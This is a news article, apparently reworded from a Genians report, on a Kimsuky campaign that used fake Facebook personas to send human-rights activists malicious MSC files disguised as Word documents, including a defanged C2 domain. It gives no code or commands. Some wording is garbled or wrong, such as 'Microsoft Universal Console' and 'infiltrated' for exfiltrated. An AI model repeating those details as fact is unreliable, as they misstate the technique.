The North Korea-linked Kimsuky hacking group has been attributed to a new social engineering attack that uses fictitious Facebook accounts to target targets via Messenger, ultimately spreading malware.
“The threat actor created a Facebook account pretending to be a public official working in the human rights field in North Korea,” South Korean cybersecurity firm Genians said in a report released last week.
The statement pointed out that this multi-stage attack campaign, impersonating legitimate individuals, was designed to target North Korean human rights and anti-North Korea activists.
This approach differs from typical email-based spear phishing tactics by leveraging social media platforms to approach targets via Facebook Messenger and trick them into opening a seemingly private document written by the persona.
Hosted on OneDrive, the decoy document is a Microsoft Universal Console document disguised as articles or content related to the trilateral summit between Japan, South Korea and the United States – “My_Essay(prof).msc” or “NZZ_Interview_Kohei Yamamoto” .
This raises the possibility that the campaign may be targeting specific groups of people in Japan and South Korea.
The use of MSC files to carry out the attack indicates that Kimsuky is leveraging unusual document types to fly under the radar. To further increase the likelihood of a successful infection, the file is disguised as a harmless Word file using a word processor icon.
If the victim launches the MSC file and agrees to open it using the Microsoft Management Console (MMC), a console screen containing a Word file is displayed, which upon launch initiates the attack sequence.
This involves running commands to interact with a server controlled by an adversary (“brandwizer.co[.]in”) to display a document hosted on Google Drive (“Korea Forced Labor Claims Settlement Paper.docx”), while executing other instructions in the background to set persistence and collect battery and process information.
The collected information is then infiltrated into a command and control (C2) server, which is also able to obtain the IP address, user-agent string, and timestamp information from the HTTP request, and pass the relevant payload as needed.
Genians said some of the tactics, techniques and procedures (TTPs) used in this campaign overlap with Kimsuky’s previous campaigns to spread malware such as ReconShark, which SentinelOne detailed in May 2023.
“Spear phishing attacks were the most common APT attack method reported in South Korea during the first quarter of this year,” the company noted. “While less commonly reported, covert attacks via social media are also occurring.”
“Due to their one-to-one, personalized nature, they are not easily detected by security monitoring, and even if victims are aware of them, they are rarely reported externally. Therefore, it is important to detect these personalized threats early.” stage. “
